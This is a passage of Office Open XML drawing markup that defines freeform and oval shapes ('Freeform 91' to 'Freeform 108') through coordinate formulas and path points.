                  <a:gd name="T15" fmla="*/ 6 h 17"/>
                  <a:gd name="T16" fmla="*/ 9 w 17"/>
                  <a:gd name="T17" fmla="*/ 4 h 17"/>
                  <a:gd name="T18" fmla="*/ 9 w 17"/>
                  <a:gd name="T19" fmla="*/ 0 h 17"/>
                  <a:gd name="T20" fmla="*/ 9 w 17"/>
                  <a:gd name="T21" fmla="*/ 1 h 17"/>
                  <a:gd name="T22" fmla="*/ 8 w 17"/>
                  <a:gd name="T23" fmla="*/ 4 h 17"/>
                  <a:gd name="T24" fmla="*/ 8 w 17"/>
                  <a:gd name="T25" fmla="*/ 5 h 17"/>
                  <a:gd name="T26" fmla="*/ 8 w 17"/>
                  <a:gd name="T27" fmla="*/ 8 h 17"/>
                  <a:gd name="T28" fmla="*/ 9 w 17"/>
                  <a:gd name="T29" fmla="*/ 9 h 17"/>
                  <a:gd name="T30" fmla="*/ 10 w 17"/>
                  <a:gd name="T31" fmla="*/ 12 h 17"/>
                  <a:gd name="T32" fmla="*/ 9 w 17"/>
                  <a:gd name="T33" fmla="*/ 13 h 17"/>
                  <a:gd name="T34" fmla="*/ 5 w 17"/>
                  <a:gd name="T35" fmla="*/ 13 h 17"/>
                  <a:gd name="T36" fmla="*/ 4 w 17"/>
                  <a:gd name="T37" fmla="*/ 12 h 17"/>
                  <a:gd name="T38" fmla="*/ 3 w 17"/>
                  <a:gd name="T39" fmla="*/ 9 h 17"/>
                  <a:gd name="T40" fmla="*/ 3 w 17"/>
                  <a:gd name="T41" fmla="*/ 8 h 17"/>
                  <a:gd name="T42" fmla="*/ 3 w 17"/>
                  <a:gd name="T43" fmla="*/ 4 h 17"/>
                  <a:gd name="T44" fmla="*/ 2 w 17"/>
                  <a:gd name="T45" fmla="*/ 8 h 17"/>
                  <a:gd name="T46" fmla="*/ 2 w 17"/>
                  <a:gd name="T47" fmla="*/ 9 h 17"/>
                  <a:gd name="T48" fmla="*/ 4 w 17"/>
                  <a:gd name="T49" fmla="*/ 12 h 17"/>
                  <a:gd name="T50" fmla="*/ 4 w 17"/>
                  <a:gd name="T51" fmla="*/ 14 h 17"/>
                  <a:gd name="T52" fmla="*/ 3 w 17"/>
                  <a:gd name="T53" fmla="*/ 16 h 17"/>
                  <a:gd name="T54" fmla="*/ 2 w 17"/>
                  <a:gd name="T55" fmla="*/ 14 h 17"/>
                  <a:gd name="T56" fmla="*/ 0 w 17"/>
                  <a:gd name="T57" fmla="*/ 12 h 17"/>
                  <a:gd name="T58" fmla="*/ 1 w 17"/>
                  <a:gd name="T59" fmla="*/ 14 h 17"/>
                  <a:gd name="T60" fmla="*/ 2 w 17"/>
                  <a:gd name="T61" fmla="*/ 16 h 17"/>
                  <a:gd name="T62" fmla="*/ 4 w 17"/>
                  <a:gd name="T63" fmla="*/ 16 h 17"/>
                  <a:gd name="T64" fmla="*/ 4 w 17"/>
                  <a:gd name="T65" fmla="*/ 14 h 17"/>
                  <a:gd name="T66" fmla="*/ 4 w 17"/>
                  <a:gd name="T67" fmla="*/ 12 h 17"/>
                  <a:gd name="T68" fmla="*/ 5 w 17"/>
                  <a:gd name="T69" fmla="*/ 14 h 17"/>
                  <a:gd name="T70" fmla="*/ 8 w 17"/>
                  <a:gd name="T71" fmla="*/ 14 h 17"/>
                  <a:gd name="T72" fmla="*/ 10 w 17"/>
                  <a:gd name="T73" fmla="*/ 14 h 17"/>
                  <a:gd name="T74" fmla="*/ 10 w 17"/>
                  <a:gd name="T75" fmla="*/ 12 h 17"/>
                  <a:gd name="T76" fmla="*/ 11 w 17"/>
                  <a:gd name="T77" fmla="*/ 12 h 17"/>
                  <a:gd name="T78" fmla="*/ 12 w 17"/>
                  <a:gd name="T79" fmla="*/ 12 h 17"/>
                  <a:gd name="T80" fmla="*/ 14 w 17"/>
                  <a:gd name="T81" fmla="*/ 12 h 17"/>
                  <a:gd name="T82" fmla="*/ 14 w 17"/>
                  <a:gd name="T83" fmla="*/ 10 h 17"/>
                  <a:gd name="T84" fmla="*/ 12 w 17"/>
                  <a:gd name="T85" fmla="*/ 5 h 17"/>
                  <a:gd name="T86" fmla="*/ 14 w 17"/>
                  <a:gd name="T87" fmla="*/ 3 h 17"/>
                  <a:gd name="T88" fmla="*/ 16 w 17"/>
                  <a:gd name="T89" fmla="*/ 0 h 17"/>
                  <a:gd name="T90" fmla="*/ 14 w 17"/>
                  <a:gd name="T91" fmla="*/ 0 h 1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"/>
                  <a:gd name="T139" fmla="*/ 0 h 17"/>
                  <a:gd name="T140" fmla="*/ 17 w 17"/>
                  <a:gd name="T141" fmla="*/ 17 h 1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" h="17">
                    <a:moveTo>
                      <a:pt x="14" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11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9" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="13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4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3" y="16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5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="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6" name="Freeform 91">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4188CB58-1A1B-4427-99DA-5A97493D7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25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6 h 1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7"/>
                  <a:gd name="T11" fmla="*/ 1 w 1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7" name="Freeform 92">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A322601C-BF98-4D8C-B204-560D3708D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" y="2225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8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8 w 17"/>
                  <a:gd name="T9" fmla="*/ 8 h 17"/>
                  <a:gd name="T10" fmla="*/ 8 w 17"/>
                  <a:gd name="T11" fmla="*/ 0 h 17"/>
                  <a:gd name="T12" fmla="*/ 0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8" name="Freeform 93">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C9D00BA-522B-429D-92E1-1199D9CD6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2227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6 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 1"/>
                  <a:gd name="T7" fmla="*/ 0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29" name="Freeform 94">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF5DE8C2-F0BF-4D18-8C18-8C7E63499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3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4 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 17"/>
                  <a:gd name="T5" fmla="*/ 8 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 0 w 17"/>
                  <a:gd name="T9" fmla="*/ 10 h 17"/>
                  <a:gd name="T10" fmla="*/ 0 w 17"/>
                  <a:gd name="T11" fmla="*/ 6 h 17"/>
                  <a:gd name="T12" fmla="*/ 0 w 17"/>
                  <a:gd name="T13" fmla="*/ 4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0" name="Freeform 95">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D51890A3-47C9-4C1D-A00F-3A4ACA16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" y="2229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9 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 1"/>
                  <a:gd name="T4" fmla="*/ 0 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 1"/>
                  <a:gd name="T6" fmla="*/ 5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1" name="Freeform 96">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E009861E-EF5E-4212-9616-0054AA7B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4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4 w 17"/>
                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                  <a:gd name="T4" fmla="*/ 16 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 4 w 17"/>
                  <a:gd name="T7" fmla="*/ 8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4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4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2" name="Freeform 97">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B14E21A4-1D11-45BB-9259-6B67D05F1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" y="2239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4 h 17"/>
                  <a:gd name="T4" fmla="*/ 5 w 17"/>
                  <a:gd name="T5" fmla="*/ 10 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 9 w 17"/>
                  <a:gd name="T9" fmla="*/ 16 h 17"/>
                  <a:gd name="T10" fmla="*/ 16 w 17"/>
                  <a:gd name="T11" fmla="*/ 10 h 17"/>
                  <a:gd name="T12" fmla="*/ 16 w 17"/>
                  <a:gd name="T13" fmla="*/ 4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6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="10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16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16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3" name="Freeform 98">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD943A31-BFDF-4543-8928-EA5718DD3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" y="2211"/>
                <a:ext cx="27" cy="20"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 27"/>
                  <a:gd name="T1" fmla="*/ 19 h 20"/>
                  <a:gd name="T2" fmla="*/ 0 w 27"/>
                  <a:gd name="T3" fmla="*/ 9 h 20"/>
                  <a:gd name="T4" fmla="*/ 8 w 27"/>
                  <a:gd name="T5" fmla="*/ 4 h 20"/>
                  <a:gd name="T6" fmla="*/ 21 w 27"/>
                  <a:gd name="T7" fmla="*/ 0 h 20"/>
                  <a:gd name="T8" fmla="*/ 26 w 27"/>
                  <a:gd name="T9" fmla="*/ 10 h 20"/>
                  <a:gd name="T10" fmla="*/ 13 w 27"/>
                  <a:gd name="T11" fmla="*/ 14 h 20"/>
                  <a:gd name="T12" fmla="*/ 5 w 27"/>
                  <a:gd name="T13" fmla="*/ 1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20"/>
                  <a:gd name="T23" fmla="*/ 27 w 27"/>
                  <a:gd name="T24" fmla="*/ 20 h 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20">
                    <a:moveTo>
                      <a:pt x="5" y="19"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="19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4" name="Oval 99">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF375A0B-3FFF-4ADD-9A7B-2A4ED2A50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7" y="2228"/>
                <a:ext cx="8" cy="8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Freeform 100">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687D5CA8-1D86-4A11-ABF6-091A1CCD0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" y="222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3 w 17"/>
                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                  <a:gd name="T4" fmla="*/ 16 w 17"/>
                  <a:gd name="T5" fmla="*/ 5 h 17"/>
                  <a:gd name="T6" fmla="*/ 16 w 17"/>
                  <a:gd name="T7" fmla="*/ 3 h 17"/>
                  <a:gd name="T8" fmla="*/ 16 w 17"/>
                  <a:gd name="T9" fmla="*/ 1 h 17"/>
                  <a:gd name="T10" fmla="*/ 16 w 17"/>
                  <a:gd name="T11" fmla="*/ 0 h 17"/>
                  <a:gd name="T12" fmla="*/ 13 w 17"/>
                  <a:gd name="T13" fmla="*/ 0 h 17"/>
                  <a:gd name="T14" fmla="*/ 8 w 17"/>
                  <a:gd name="T15" fmla="*/ 0 h 17"/>
                  <a:gd name="T16" fmla="*/ 6 w 17"/>
                  <a:gd name="T17" fmla="*/ 1 h 17"/>
                  <a:gd name="T18" fmla="*/ 4 w 17"/>
                  <a:gd name="T19" fmla="*/ 3 h 17"/>
                  <a:gd name="T20" fmla="*/ 4 w 17"/>
                  <a:gd name="T21" fmla="*/ 5 h 17"/>
                  <a:gd name="T22" fmla="*/ 3 w 17"/>
                  <a:gd name="T23" fmla="*/ 8 h 17"/>
                  <a:gd name="T24" fmla="*/ 0 w 17"/>
                  <a:gd name="T25" fmla="*/ 10 h 17"/>
                  <a:gd name="T26" fmla="*/ 8 w 17"/>
                  <a:gd name="T27" fmla="*/ 16 h 17"/>
                  <a:gd name="T28" fmla="*/ 13 w 17"/>
                  <a:gd name="T29" fmla="*/ 14 h 17"/>
                  <a:gd name="T30" fmla="*/ 16 w 17"/>
                  <a:gd name="T31" fmla="*/ 9 h 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"/>
                  <a:gd name="T49" fmla="*/ 0 h 17"/>
                  <a:gd name="T50" fmla="*/ 17 w 17"/>
                  <a:gd name="T51" fmla="*/ 17 h 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" h="17">
                    <a:moveTo>
                      <a:pt x="16" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="8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8" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="14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6" name="Freeform 101">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2976565C-C40F-4267-B7AA-A973FE295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" y="2230"/>
                <a:ext cx="17" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 17"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 0 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 1"/>
                  <a:gd name="T4" fmla="*/ 16 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 1"/>
                  <a:gd name="T6" fmla="*/ 8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8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7" name="Freeform 102">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC992C46-7D61-47CC-A076-2FBE26038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" y="2213"/>
                <a:ext cx="17" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 16 w 17"/>
                  <a:gd name="T1" fmla="*/ 3 h 17"/>
                  <a:gd name="T2" fmla="*/ 16 w 17"/>
                  <a:gd name="T3" fmla="*/ 6 h 17"/>
                  <a:gd name="T4" fmla="*/ 13 w 17"/>
                  <a:gd name="T5" fmla="*/ 8 h 17"/>
                  <a:gd name="T6" fmla="*/ 13 w 17"/>
                  <a:gd name="T7" fmla="*/ 10 h 17"/>
                  <a:gd name="T8" fmla="*/ 16 w 17"/>
                  <a:gd name="T9" fmla="*/ 12 h 17"/>
                  <a:gd name="T10" fmla="*/ 13 w 17"/>
                  <a:gd name="T11" fmla="*/ 13 h 17"/>
                  <a:gd name="T12" fmla="*/ 11 w 17"/>
                  <a:gd name="T13" fmla="*/ 14 h 17"/>
                  <a:gd name="T14" fmla="*/ 9 w 17"/>
                  <a:gd name="T15" fmla="*/ 16 h 17"/>
                  <a:gd name="T16" fmla="*/ 6 w 17"/>
                  <a:gd name="T17" fmla="*/ 16 h 17"/>
                  <a:gd name="T18" fmla="*/ 2 w 17"/>
                  <a:gd name="T19" fmla="*/ 14 h 17"/>
                  <a:gd name="T20" fmla="*/ 0 w 17"/>
                  <a:gd name="T21" fmla="*/ 13 h 17"/>
                  <a:gd name="T22" fmla="*/ 0 w 17"/>
                  <a:gd name="T23" fmla="*/ 12 h 17"/>
                  <a:gd name="T24" fmla="*/ 0 w 17"/>
                  <a:gd name="T25" fmla="*/ 9 h 17"/>
                  <a:gd name="T26" fmla="*/ 0 w 17"/>
                  <a:gd name="T27" fmla="*/ 8 h 17"/>
                  <a:gd name="T28" fmla="*/ 0 w 17"/>
                  <a:gd name="T29" fmla="*/ 4 h 17"/>
                  <a:gd name="T30" fmla="*/ 2 w 17"/>
                  <a:gd name="T31" fmla="*/ 3 h 17"/>
                  <a:gd name="T32" fmla="*/ 4 w 17"/>
                  <a:gd name="T33" fmla="*/ 0 h 17"/>
                  <a:gd name="T34" fmla="*/ 13 w 17"/>
                  <a:gd name="T35" fmla="*/ 0 h 17"/>
                  <a:gd name="T36" fmla="*/ 16 w 17"/>
                  <a:gd name="T37" fmla="*/ 3 h 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17"/>
                  <a:gd name="T59" fmla="*/ 17 w 17"/>
                  <a:gd name="T60" fmla="*/ 17 h 1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17">
                    <a:moveTo>
                      <a:pt x="16" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9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13" y="0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8" name="Freeform 103">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73188A0A-A76D-416A-B37F-CC0A16738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220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7"/>
                  <a:gd name="T11" fmla="*/ 1 w 1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39" name="Freeform 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3779A6B4-8EB2-477D-ADA9-B20A4E373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9" y="2504"/>
                <a:ext cx="94" cy="43"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 94"/>
                  <a:gd name="T1" fmla="*/ 1 h 43"/>
                  <a:gd name="T2" fmla="*/ 56 w 94"/>
                  <a:gd name="T3" fmla="*/ 12 h 43"/>
                  <a:gd name="T4" fmla="*/ 31 w 94"/>
                  <a:gd name="T5" fmla="*/ 22 h 43"/>
                  <a:gd name="T6" fmla="*/ 10 w 94"/>
                  <a:gd name="T7" fmla="*/ 27 h 43"/>
                  <a:gd name="T8" fmla="*/ 0 w 94"/>
                  <a:gd name="T9" fmla="*/ 30 h 43"/>
                  <a:gd name="T10" fmla="*/ 0 w 94"/>
                  <a:gd name="T11" fmla="*/ 37 h 43"/>
                  <a:gd name="T12" fmla="*/ 15 w 94"/>
                  <a:gd name="T13" fmla="*/ 40 h 43"/>
                  <a:gd name="T14" fmla="*/ 37 w 94"/>
                  <a:gd name="T15" fmla="*/ 42 h 43"/>
                  <a:gd name="T16" fmla="*/ 56 w 94"/>
                  <a:gd name="T17" fmla="*/ 38 h 43"/>
                  <a:gd name="T18" fmla="*/ 67 w 94"/>
                  <a:gd name="T19" fmla="*/ 36 h 43"/>
                  <a:gd name="T20" fmla="*/ 68 w 94"/>
                  <a:gd name="T21" fmla="*/ 39 h 43"/>
                  <a:gd name="T22" fmla="*/ 82 w 94"/>
                  <a:gd name="T23" fmla="*/ 38 h 43"/>
                  <a:gd name="T24" fmla="*/ 92 w 94"/>
                  <a:gd name="T25" fmla="*/ 38 h 43"/>
                  <a:gd name="T26" fmla="*/ 92 w 94"/>
                  <a:gd name="T27" fmla="*/ 32 h 43"/>
                  <a:gd name="T28" fmla="*/ 93 w 94"/>
                  <a:gd name="T29" fmla="*/ 28 h 43"/>
                  <a:gd name="T30" fmla="*/ 93 w 94"/>
                  <a:gd name="T31" fmla="*/ 20 h 43"/>
                  <a:gd name="T32" fmla="*/ 90 w 94"/>
                  <a:gd name="T33" fmla="*/ 16 h 43"/>
                  <a:gd name="T34" fmla="*/ 86 w 94"/>
                  <a:gd name="T35" fmla="*/ 11 h 43"/>
                  <a:gd name="T36" fmla="*/ 85 w 94"/>
                  <a:gd name="T37" fmla="*/ 0 h 43"/>
                  <a:gd name="T38" fmla="*/ 55 w 94"/>
                  <a:gd name="T39" fmla="*/ 1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4"/>
                  <a:gd name="T61" fmla="*/ 0 h 43"/>
                  <a:gd name="T62" fmla="*/ 94 w 94"/>
                  <a:gd name="T63" fmla="*/ 43 h 4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4" h="43">
                    <a:moveTo>
                      <a:pt x="55" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="56" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="27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15" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85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0" name="Freeform 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA90605F-BDBD-4994-A7A9-9906BAC19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" y="2520"/>
                <a:ext cx="26" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 26"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 25 w 26"/>
                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                  <a:gd name="T4" fmla="*/ 2 w 26"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 26"/>
                  <a:gd name="T7" fmla="*/ 10 h 17"/>
                  <a:gd name="T8" fmla="*/ 19 w 26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7"/>
                  <a:gd name="T17" fmla="*/ 26 w 2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7">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="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19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1" name="Freeform 106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA12FAF9-EAC3-4FF4-8022-5A5785D7B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2530"/>
                <a:ext cx="28" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 28"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 27 w 28"/>
                  <a:gd name="T3" fmla="*/ 5 h 17"/>
                  <a:gd name="T4" fmla="*/ 13 w 28"/>
                  <a:gd name="T5" fmla="*/ 12 h 17"/>
                  <a:gd name="T6" fmla="*/ 7 w 28"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 0 w 28"/>
                  <a:gd name="T9" fmla="*/ 16 h 17"/>
                  <a:gd name="T10" fmla="*/ 7 w 28"/>
                  <a:gd name="T11" fmla="*/ 5 h 17"/>
                  <a:gd name="T12" fmla="*/ 23 w 28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"/>
                  <a:gd name="T22" fmla="*/ 0 h 17"/>
                  <a:gd name="T23" fmla="*/ 28 w 2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" h="17">
                    <a:moveTo>
                      <a:pt x="23" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="5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2" name="Freeform 107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E30E2B13-4CF4-4266-A7C9-B2A7C7ED5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2520"/>
                <a:ext cx="86" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 86"/>
                  <a:gd name="T1" fmla="*/ 17 h 21"/>
                  <a:gd name="T2" fmla="*/ 0 w 86"/>
                  <a:gd name="T3" fmla="*/ 14 h 21"/>
                  <a:gd name="T4" fmla="*/ 11 w 86"/>
                  <a:gd name="T5" fmla="*/ 15 h 21"/>
                  <a:gd name="T6" fmla="*/ 28 w 86"/>
                  <a:gd name="T7" fmla="*/ 12 h 21"/>
                  <a:gd name="T8" fmla="*/ 39 w 86"/>
                  <a:gd name="T9" fmla="*/ 11 h 21"/>
                  <a:gd name="T10" fmla="*/ 59 w 86"/>
                  <a:gd name="T11" fmla="*/ 6 h 21"/>
                  <a:gd name="T12" fmla="*/ 67 w 86"/>
                  <a:gd name="T13" fmla="*/ 5 h 21"/>
                  <a:gd name="T14" fmla="*/ 75 w 86"/>
                  <a:gd name="T15" fmla="*/ 3 h 21"/>
                  <a:gd name="T16" fmla="*/ 80 w 86"/>
                  <a:gd name="T17" fmla="*/ 0 h 21"/>
                  <a:gd name="T18" fmla="*/ 85 w 86"/>
                  <a:gd name="T19" fmla="*/ 4 h 21"/>
                  <a:gd name="T20" fmla="*/ 85 w 86"/>
                  <a:gd name="T21" fmla="*/ 12 h 21"/>
                  <a:gd name="T22" fmla="*/ 79 w 86"/>
                  <a:gd name="T23" fmla="*/ 14 h 21"/>
                  <a:gd name="T24" fmla="*/ 63 w 86"/>
                  <a:gd name="T25" fmla="*/ 15 h 21"/>
                  <a:gd name="T26" fmla="*/ 57 w 86"/>
                  <a:gd name="T27" fmla="*/ 16 h 21"/>
                  <a:gd name="T28" fmla="*/ 47 w 86"/>
                  <a:gd name="T29" fmla="*/ 18 h 21"/>
                  <a:gd name="T30" fmla="*/ 35 w 86"/>
                  <a:gd name="T31" fmla="*/ 20 h 21"/>
                  <a:gd name="T32" fmla="*/ 27 w 86"/>
                  <a:gd name="T33" fmla="*/ 20 h 21"/>
                  <a:gd name="T34" fmla="*/ 15 w 86"/>
                  <a:gd name="T35" fmla="*/ 20 h 21"/>
                  <a:gd name="T36" fmla="*/ 0 w 86"/>
                  <a:gd name="T37" fmla="*/ 17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6"/>
                  <a:gd name="T58" fmla="*/ 0 h 21"/>
                  <a:gd name="T59" fmla="*/ 86 w 86"/>
                  <a:gd name="T60" fmla="*/ 21 h 2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6" h="21">
                    <a:moveTo>
                      <a:pt x="0" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="20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3" name="Freeform 108">
                <a:extLst>
